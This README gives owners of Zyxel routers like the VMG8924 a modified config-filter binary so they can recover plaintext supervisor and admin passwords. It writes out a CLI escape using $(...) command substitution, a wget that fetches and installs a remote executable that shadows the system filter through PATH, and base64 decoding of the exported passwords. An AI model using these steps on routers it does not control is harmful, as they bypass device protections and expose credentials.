Tj hacker@iam.tj

2017-08-01

For Zyxel routers such as the VMG8924 and owners who want access to the unencrypted supervisor password without having to use cracking tools.

This modified executable of /bin/zycfgfilter allows the unencrypted passwords of the supervisor, admin, and other users to be exported via the regular administration web interface (Maintenance > Configuration > Backup Configuration).

Decoding the configuration file entries

The entries in the configuration-backupsettings.conf file will only be Base64 encoded and will look similar to this:

<AdminPassword>_ZEncrypted_MzBlZWM4Y2YA</AdminPassword>
<UserName>admin</UserName>
<Password>_ZEncrypted_MTIzNAA=</Password>

To decode them strip the leading "_ZEncrypted_":

# supervisor (a.k.a. root - UID = 0) for device serial # 31005832
echo MzBlZWM4Y2YA | base64 -d
30eec8cf

# 'admin' default
echo MTIzNAA= | base64 -d
1234

How it works

The only difference in the modified zycfgfilter is that all the strings within the executable that refer to the XML nodes that store passwords had the Upper Case "P" of "Password" converted to a lower case "p". This means the filter fails to match the entries fed to it from dumpmdm and so only does base64 encoding of the passwords.

The reason this works is zycfgfilter is called by the httpd service to filter out sensitive entries that the dumpmdm tool (available in the router's CLI) outputs.

The original file is at

/bin/zycfgfilter

That cannot be over-written because it is in a read-only file system. But the shell PATH variable has other directories listed before /bin/ where the modified file can be put, meaning it'll be executed instead of the system file. In this case the directory (which doesn't exist by default) to use is "/home/bin/"

Router Shell Hack

The original trick I discovered back in 2014 to execute shell commands from the terminal CLI:

> cat& bash

has been closed off in recent firmware upgrades, so there's another way to execute commands. It's a bit more convoluted and less than ideal but it's enough to do emergency hacking. This new method is to create a sub-shell with $(...) to execute a single command. E.g:

> echo $(uname -a)
Linux (none) 2.6.30 #3 SMP PREEMPT Thu May 25 18:09:29 CST 2017 mips GNU/Linux

Installation

To install on a Zyxel router (e.g. VMG8924) do, from a PC:

# set router IP
RIP=10.254.1.254

# Either:

ssh admin@$RIP

# Or:

telnet $RIP
# login: admin

> echo $(mkdir /home/bin)
> echo $(wget http://iam.tj/projects/zyxel/zycfgfilter -O /home/bin/zycfgfilter) 
Connecting to iam.tj (109.74.197.122:80)
zycfgfilter            0% |                                                 |     0  --:--:-- ETAEOMTime:1501717911.174968 2017-08-02T23:51:51.174968
zycfgfilter          100% |*************************************************| 66604  --:--:-- ETA
200 OK, File Get Success
> echo $(chmod +x /home/bin/zycfgfilter )
> echo $(ls -l /home/bin) 
-rwxr-xr-x 1 supervis root 66604 Aug 2 23:17 zycfgfilter

Now use the web interface to backup the configuration file to the PC and it will contain the passwords with the base64 encoding.

Do It Yourself

If you don't trust my modifications - although they are only conversions of "P" to "p" in several occurances of "Password" - then do it yourself by copying and modifying the file.

Verify Digital Signature and No Tampering

The SHA of the modified file is:

shasum zycfgfilter
9aa2a0b54c258b7d67a075db9ddc9f77f110c064  zycfgfilter

This is in the SHASUMS file. I've signed that file using GNU Privacy Guard (gpg) and the detached signature is SHASUMS.gpg. Both these files are in the same directory as zycfgfilter at:

https://iam.tj/projects/zyxel/

My public key ID is hacker@iam.tj and the fingerprint is:

2C9A BEB5 03E2 285A 6A5B  8A91 EFEC 37A4 29CD 6080

To add my public key to your keyring using its fingerprint:

gpg --keyserver keyserver.ubuntu.com --recv 0x2C9ABEB503E2285A6A5B8A91EFEC37A429CD6080

Once you've imported my public key to your keyring verify the SHASUMS file hasn't been tampered with:

gpg2 --verify SHASUMS.gpg SHASUMS 
gpg: Signature made Thu 03 Aug 2017 01:11:19 BST using RSA key ID 9ACC1423
gpg: Good signature from "TJ <tj@iam.tj>" [ultimate]
....

and then check the file(s) you've downloaded matches:

shasum -c SHASUMS
zycfgfilter: OK
README.html: OK
README.md: OK

Comments

Any comments please direct to the forum thread at:

http://forum.kitz.co.uk/index.php/topic,20067.0.html


This document created using:

pandoc --toc -s -t html5 -o README.html README.md